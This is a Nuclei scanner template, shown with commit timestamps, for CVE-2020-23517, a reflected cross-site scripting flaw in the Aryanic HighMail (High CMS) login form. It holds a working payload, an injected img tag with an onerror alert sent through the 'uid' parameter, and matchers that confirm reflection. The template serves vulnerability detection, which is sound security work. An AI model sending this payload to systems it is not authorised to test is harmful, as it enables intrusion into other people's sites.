nuclei-templates/cves/2020/CVE-2020-23517.yaml

25 lines
741 B
YAML
Raw Normal View History

2021-03-29 15:52:28 +00:00
id: CVE-2020-23517
info:
name: Aryanic HighMail (High CMS) XSS
author: geeknik
severity: medium
2021-03-29 19:37:59 +00:00
description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
2021-03-29 15:52:28 +00:00
reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
tags: xss,cve,cve2020
requests:
- method: GET
path:
- "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
matchers-condition: and
matchers:
- type: word
words:
- text/html
part: header
- type: word
words:
- "<img src=\"x\" onerror=\"alert('XSS')"